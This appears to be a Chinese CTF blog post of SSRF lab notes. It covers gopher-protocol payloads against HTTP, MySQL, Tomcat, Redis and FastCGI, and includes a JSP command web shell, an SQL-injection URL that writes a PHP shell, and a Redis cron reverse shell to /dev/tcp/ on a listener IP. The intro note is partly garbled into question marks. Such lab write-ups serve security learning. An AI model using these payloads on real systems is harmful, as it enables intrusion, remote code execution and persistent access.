<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>SSRF | worny&#39;s Security Lab</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="??????????????? CTF ???????????????????? PHP shell ???????????&lt;PHP_WEB_SHELL_PAYLOAD_OMITTED_FOR_SAFETY&gt;??????? PHP payload ?????????&lt;HEX_ENCODED_PHP_PAYLOAD_OMITTED_FOR_SAFETY&gt;?shell.php">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF">
<meta property="og:url" content="https://worny666.github.io/2026/07/02/SSRF/index.html">
<meta property="og:site_name" content="worny&#39;s Security Lab">
<meta property="og:description" content="??????????????? CTF ???????????????????? PHP shell ???????????&lt;PHP_WEB_SHELL_PAYLOAD_OMITTED_FOR_SAFETY&gt;??????? PHP payload ?????????&lt;HEX_ENCODED_PHP_PAYLOAD_OMITTED_FOR_SAFETY&gt;?shell.php">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316181233.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260313115858.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260313124816.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260313131110.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260314131310.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260314131324.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20251212174234.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20251212174301.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20251212174631.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20251212174805.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316191329.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316190803.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316191858.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316193056.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316193427.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316194412.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316194940.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20251212093511.png">
<meta property="og:image" content="https://worny666.github.io/images/ssrf/pasted-image-20251212093613.png">
<meta property="article:published_time" content="2026-07-02T14:00:00.000Z">
<meta property="article:modified_time" content="2026-07-02T14:20:31.235Z">
<meta property="article:author" content="worny">
<meta property="article:tag" content="SSRF">
<meta property="article:tag" content="Web??">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://worny666.github.io/images/ssrf/pasted-image-20260316181233.png">
  
  
    <link rel="icon" href="/favicon.ico">
  
  
      
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: true
      }
  </script>
<meta name="generator" content="Hexo 8.1.1"><link rel="alternate" href="/atom.xml" title="worny's Security Lab" type="application/atom+xml">
</head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic" style="display: block; width: 128px; height: 128px; margin: 0 auto;">
            <img src="/img/head.jpg" 
                 style="width: 100%; height: 100%; opacity: 1 !important; border-radius: 50%; display: block; object-fit: cover;">
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        

        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0"><div class="birdhouse"></div><div class="birdhouse_holes"></div></div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1"><div class="ribbon"></div></div>
                        
                            <div class="icon-wrap icon-link hide" data-idx="2"><div class="loopback_l"></div><div class="loopback_r"></div></div>
                        
                        
                            <div class="icon-wrap icon-me hide" data-idx="3"><div class="user"></div><div class="shoulder"></div></div>
                        
                    </div>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/archives">文章归档</a></li>
                        
                            <li><a href="/categories/CTF">CTF挑战</a></li>
                        
                            <li><a href="/categories/AI-Security">AI安全</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="/wornydddd@163.com" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/worny666" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                </div>
        </div>
    </header>
</div>

<script src="https://cdn.bootcdn.net/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/archives">文章归档</a></li>
                
                    <li><a href="/categories/CTF">CTF挑战</a></li>
                
                    <li><a href="/categories/AI-Security">AI安全</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="/wornydddd@163.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/worny666" title="github">github</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-SSRF" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2026/07/02/SSRF/" class="article-date">
      <time datetime="2026-07-02T14:00:00.000Z" itemprop="datePublished">2026-07-02</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      SSRF
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/SSRF/" rel="tag">SSRF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web/" rel="tag">Web??</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <blockquote>
<p>??????????????? CTF ??????????????<br>?????? PHP shell ???????????<code>&lt;PHP_WEB_SHELL_PAYLOAD_OMITTED_FOR_SAFETY&gt;</code>?<br>?????? PHP payload ?????????<code>&lt;HEX_ENCODED_PHP_PAYLOAD_OMITTED_FOR_SAFETY&gt;</code>?<br><code>shell.php</code> ??????? <code>output.txt</code>????????????????????</p>
</blockquote>
<h1 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>获取主机名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file:///etc/hosts</span><br></pre></td></tr></table></figure>
<p><img src="/images/ssrf/pasted-image-20260316181233.png" alt="Pasted image 20260316181233"></p>
<hr>
<p><strong><a target="_blank" rel="noopener" href="http://172.250.250.3/?id=1%27%2520union%2520select%2520NULL,NULL,NULL,%27%3C?php%2520system($_GET%5B1%5D);%2520?%3E%27%2520INTO%2520DUMPFILE%2520%27/var/www/html/output.txt%27--%2520">http://172.250.250.3?id=1&#39;%2520union%2520select%2520NULL,NULL,NULL,&#39;%3C?php%2520system($_GET[1]);%2520?%3E&#39;%2520INTO%2520DUMPFILE%2520&#39;/var/www/html/output.txt&#39;--%2520</a></strong></p>
<h2 id="gopher协议"><a href="#gopher协议" class="headerlink" title="gopher协议"></a>gopher协议</h2><h3 id="GET"><a href="#GET" class="headerlink" title="GET"></a>GET</h3><p><img src="/images/ssrf/pasted-image-20260313115858.png" alt="Pasted image 20260313115858"></p>
<h3 id="post"><a href="#post" class="headerlink" title="post"></a>post</h3><p>四个必须的参数即POST、Host、Content-Type和Content-Length。如果少了会报错的，而GET则不用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">POST /flag.php HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:80</span><br><span class="line">Content-Length: 36</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">key=21ef36770f67a6ddf8809c5f14ab557f</span><br></pre></td></tr></table></figure>
<p>1.url路径编码<br>2.二次编码，同时将<code>%0A</code>全部替换为<code>%0D%0A</code>。因为 Gopher协议包含的请求数据包中，可能包含有<code>=</code>、<code>&amp;</code>等特殊字符，避免与服务器解析传入的参数键值对混淆，所以对数据包进行 URL编码，这样服务端会把<code>%</code>后的字节当做普通字节<br>3.最终完整url</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://challenge-2cc48a18335efbf5.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D21ef36770f67a6ddf8809c5f14ab557f</span><br></pre></td></tr></table></figure>
<blockquote>
<p>gopher协议记得在目标ip地址即host后面加一个占位符，不然会被吞掉第一个字符，推荐使用<code>_</code><br>{下划线}</p>
</blockquote>
<h2 id="SSRF之XXE"><a href="#SSRF之XXE" class="headerlink" title="SSRF之XXE"></a>SSRF之XXE</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; </span><br><span class="line">&lt;!DOCTYPE user [ </span><br><span class="line">&lt;!ENTITY xxe SYSTEM &quot;file:///etc/hosts&quot; &gt;]&gt; </span><br><span class="line">&lt;user&gt; </span><br><span class="line">    &lt;username&gt;&amp;xxe;&lt;/username&gt; </span><br><span class="line">    &lt;password&gt;admin&lt;/password&gt; </span><br><span class="line">&lt;/user&gt;</span><br></pre></td></tr></table></figure>

<p>将其附加至正常抓包页面下同时删去 <code>Accept-Encoding</code> 这一行，再将整体进行双重url编码<br>接着构造gopher协议即可</p>
<h2 id="SSRF之SQL注入"><a href="#SSRF之SQL注入" class="headerlink" title="SSRF之SQL注入"></a>SSRF之SQL注入</h2><p><img src="/images/ssrf/pasted-image-20260313124816.png" alt="Pasted image 20260313124816"><br>再将ip后两次url编码</p>
<h2 id="SSRF之mysql"><a href="#SSRF之mysql" class="headerlink" title="SSRF之mysql"></a>SSRF之mysql</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python2 gopherus.py --exploit mysql  #启动 Gopherus 工具</span><br><span class="line">Give MySQL username: root</span><br><span class="line">Give query to execute: select * from security.users #**执行的 SQL 语句**</span><br></pre></td></tr></table></figure>
<p><img src="/images/ssrf/pasted-image-20260313131110.png" alt="Pasted image 20260313131110"><br>结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%00%00%00%03%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%2e%75%73%65%72%73%01%00%00%00%01</span><br></pre></td></tr></table></figure>



<h2 id="SSRF之tomcat"><a href="#SSRF之tomcat" class="headerlink" title="SSRF之tomcat"></a>SSRF之tomcat</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">    String command = request.getParameter(&quot;cmd&quot;);</span><br><span class="line">    if(command != null)</span><br><span class="line">    &#123;</span><br><span class="line">        java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream();</span><br><span class="line">        int a = -1;</span><br><span class="line">        byte[] b = new byte[2048];</span><br><span class="line">        out.print(&quot;&lt;pre&gt;&quot;);</span><br><span class="line">        while((a=in.read(b))!=-1)</span><br><span class="line">        &#123;</span><br><span class="line">            out.println(new String(b));</span><br><span class="line">        &#125;</span><br><span class="line">        out.print(&quot;&lt;/pre&gt;&quot;);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        out.print(&quot;format: xxx.jsp?cmd=Command&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>将其附加至你的抓包页面下，同时再将整体进行双重url编码<br>接着构造gopher协议即可<br><img src="/images/ssrf/pasted-image-20260314131310.png" alt="Pasted image 20260314131310"></p>
<p><img src="/images/ssrf/pasted-image-20260314131324.png" alt="Pasted image 20260314131324"></p>
<h2 id="redis"><a href="#redis" class="headerlink" title="redis"></a>redis</h2><h3 id="未授权webshell写入"><a href="#未授权webshell写入" class="headerlink" title="未授权webshell写入"></a>未授权webshell写入</h3><p>1.虚拟机kali中</p>
<ul>
<li>cd ~&#x2F;桌面&#x2F;Gopherus</li>
<li>启动攻击模块：python2 gopherus.py –exploit redis</li>
<li>第一行输入攻击类型：PHPShell：生成一个 PHP WebShell 文件</li>
<li><pre><code>                             ReverseShell：生成一个直接反弹 Shell 的 payload
</code></pre>
</li>
<li>第二行输入路径:这个路径决定了 Redis 写入的恶意文件最终存储在服务器的哪个位置，需根据目标服务器的 Web 目录结构或可利用路径填写，才能让后续的恶意文件被有效访问和执行</li>
<li><pre><code>                          /var/www/html
</code></pre>
</li>
<li>第三行输入 WebShell 内容:<code>&lt;?=</code>$_GET[1]<code>?&gt;</code>Gopherus 会自动将 <code>dbfilename</code>（Redis 持久化文件名）设置为 <code>output.txt，配置完毕后</code>Gopherus 工具会根据输入生成相应的 Gopher 协议有效载荷<img src="/images/ssrf/pasted-image-20251212174234.png" alt="Pasted image 20251212174234"><br>2.再次编码后附加到url，显示此页面为504，没有关系，执行这段payload的目标就是在服务器根目录上传木马output.txt<br><img src="/images/ssrf/pasted-image-20251212174301.png" alt="Pasted image 20251212174301"><br>3.列出目录<br><img src="/images/ssrf/pasted-image-20251212174631.png" alt="Pasted image 20251212174631"><br>4.获取flag<br><img src="/images/ssrf/pasted-image-20251212174805.png" alt="Pasted image 20251212174805"></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">*1</span><br><span class="line">$7</span><br><span class="line">COMMAND</span><br><span class="line">*4</span><br><span class="line">$6</span><br><span class="line">CONFIG</span><br><span class="line">$3</span><br><span class="line">SET</span><br><span class="line">$3</span><br><span class="line">dir</span><br><span class="line">$14</span><br><span class="line">/var/www/html/</span><br><span class="line">*4</span><br><span class="line">$6</span><br><span class="line">config</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$10</span><br><span class="line">dbfilename</span><br><span class="line">$8</span><br><span class="line">info.php</span><br><span class="line">*3</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$7</span><br><span class="line">payload</span><br><span class="line">$19</span><br><span class="line">&lt;PHP_WEB_SHELL_PAYLOAD_OMITTED_FOR_SAFETY&gt;</span><br><span class="line">*1</span><br><span class="line">$4</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p>每行都是以 <code>\r</code> 结尾的，但是 Redis 的协议是以 CRLF (<code>\r\n</code>) 结尾，所以转换的时候需要把 <code>\r</code> 转换为 <code>\r\n</code>，然后其他全部进行 两次 URL 编码</p>
<h3 id="redis未授权ssh公钥写入"><a href="#redis未授权ssh公钥写入" class="headerlink" title="redis未授权ssh公钥写入"></a>redis未授权ssh公钥写入</h3><p>1.生成公钥</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa</span><br></pre></td></tr></table></figure>

<p><img src="/images/ssrf/pasted-image-20260316191329.png" alt="Pasted image 20260316191329"><br>2.构造，将密钥写入payload（记得前后各加两行换行以排除其他因素的干扰，同时长度记得加4）同时修改文件名和路径（要拥有root权限，不然写入不了）<br>最后记得修改长度<br><img src="/images/ssrf/pasted-image-20260316190803.png" alt="Pasted image 20260316190803"><br>3.通过ssrf提交后重新登陆靶机发现不在需要密码了<br><img src="/images/ssrf/pasted-image-20260316191858.png" alt="Pasted image 20260316191858"></p>
<h3 id="定时任务反弹shell"><a href="#定时任务反弹shell" class="headerlink" title="定时任务反弹shell"></a>定时任务反弹shell</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip add #查看kali ip地址，我的是172.28.121.48</span><br></pre></td></tr></table></figure>

<p><img src="/images/ssrf/pasted-image-20260316193056.png" alt="Pasted image 20260316193056"><br>1.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 gopherus.py --exploit redis</span><br></pre></td></tr></table></figure>
<p>启动攻击<br>2.选择Reverseshell<br><img src="/images/ssrf/pasted-image-20260316193427.png" alt="Pasted image 20260316193427"><br>3.填写ip<br><img src="/images/ssrf/pasted-image-20260316194412.png" alt="Pasted image 20260316194412"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2468%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/172.28.121.48/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A/var/spool/cron/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A</span><br></pre></td></tr></table></figure>
<p>接着监听端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 1234</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>在靶场修改主机名发送即可<br><img src="/images/ssrf/pasted-image-20260316194940.png" alt="Pasted image 20260316194940"></p>
<h2 id="FastCGL协议"><a href="#FastCGL协议" class="headerlink" title="FastCGL协议"></a>FastCGL协议</h2><p>1.在虚拟机kali中打开终端</p>
<ul>
<li>命令行下载：git clone <a target="_blank" rel="noopener" href="https://github.com/tarunkant/Gopherus.git">https://github.com/tarunkant/Gopherus.git</a></li>
<li>cd ~&#x2F;桌面&#x2F;Gopherus</li>
<li>启动攻击模块：python2 gopherus.py –exploit fastcgi </li>
<li>第一行输入路径：启动 Gopherus 的 FastCGI 攻击模块后，工具会提示输入目标服务器上存在的 PHP 文件路径，输入之前获取的 PHP 文件路径，我们这里选中网站根目录下的index.php文件，路径如下为&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php，这里通常选择网址中存在的文件</li>
<li>第二行输入要执行的命令：接下来工具提示输入要执行的命令，这是可以选择ls &#x2F;或cat &#x2F;flag等，工具会根据输入生成相应的 Gopher 协议有效载荷。我们这里选择使用在根目录上传木马文件ljn.php，如下 echo PD9waHAgQGV2YWwoJF9QT1NUWydtb295dWFuJ10pOz8+ | base64 -d &gt;&#x2F;var&#x2F;www&#x2F;html&#x2F;ljn.php ————把编码后的一句话木马写到名为ljn.php的文件中</li>
<li>得到gopher:%2F%2F127.0.0.1:9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH137%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2589%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520PD9waHAgQGV2YWwoJF9QT1NUWydtb295dWFuJ10pOz8%252B%2520%257C%2520base64%2520-d%2520%253E%2520%2Fvar%2Fwww%2Fhtml%2Fljn.php%2527%2529%253Bdie%2528%2527—–Made-by-SpyD3r—–%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500<br>2.在浏览器中将其附加在url后面<br>3.列出目录<br><img src="/images/ssrf/pasted-image-20251212093511.png" alt="Pasted image 20251212093511"><br>4.获取flag<br><img src="/images/ssrf/pasted-image-20251212093613.png" alt="Pasted image 20251212093613"></li>
</ul>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2026/07/02/SSRF/">SSRF</a></p>
        <p><span>文章作者:</span><a href="/" title="访问  的个人博客"></a></p>
        <p><span>发布时间:</span>2026年07月02日 - 22时00分</p>
        <p><span>最后更新:</span>2026年07月02日 - 22时20分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2026/07/02/SSRF/" title="SSRF">https://worny666.github.io/2026/07/02/SSRF/</a>
            <span class="copy-path" data-clipboard-text="原文: https://worny666.github.io/2026/07/02/SSRF/　　作者: " title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2026/07/02/RCE/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          RCE
        
      </div>
    </a>
  
  
    <a href="/2026/07/02/SQL%E6%B3%A8%E5%85%A5/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">SQL注入</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SSRF"><span class="toc-number">1.</span> <span class="toc-text">SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#gopher%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.2.</span> <span class="toc-text">gopher协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#GET"><span class="toc-number">1.2.1.</span> <span class="toc-text">GET</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#post"><span class="toc-number">1.2.2.</span> <span class="toc-text">post</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF%E4%B9%8BXXE"><span class="toc-number">1.3.</span> <span class="toc-text">SSRF之XXE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF%E4%B9%8BSQL%E6%B3%A8%E5%85%A5"><span class="toc-number">1.4.</span> <span class="toc-text">SSRF之SQL注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF%E4%B9%8Bmysql"><span class="toc-number">1.5.</span> <span class="toc-text">SSRF之mysql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF%E4%B9%8Btomcat"><span class="toc-number">1.6.</span> <span class="toc-text">SSRF之tomcat</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#redis"><span class="toc-number">1.7.</span> <span class="toc-text">redis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83webshell%E5%86%99%E5%85%A5"><span class="toc-number">1.7.1.</span> <span class="toc-text">未授权webshell写入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#redis%E6%9C%AA%E6%8E%88%E6%9D%83ssh%E5%85%AC%E9%92%A5%E5%86%99%E5%85%A5"><span class="toc-number">1.7.2.</span> <span class="toc-text">redis未授权ssh公钥写入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.7.3.</span> <span class="toc-text">定时任务反弹shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastCGL%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.8.</span> <span class="toc-text">FastCGL协议</span></a></li></ol></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">


<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>







    



    <div class="scroll" id="post-nav-button">
        
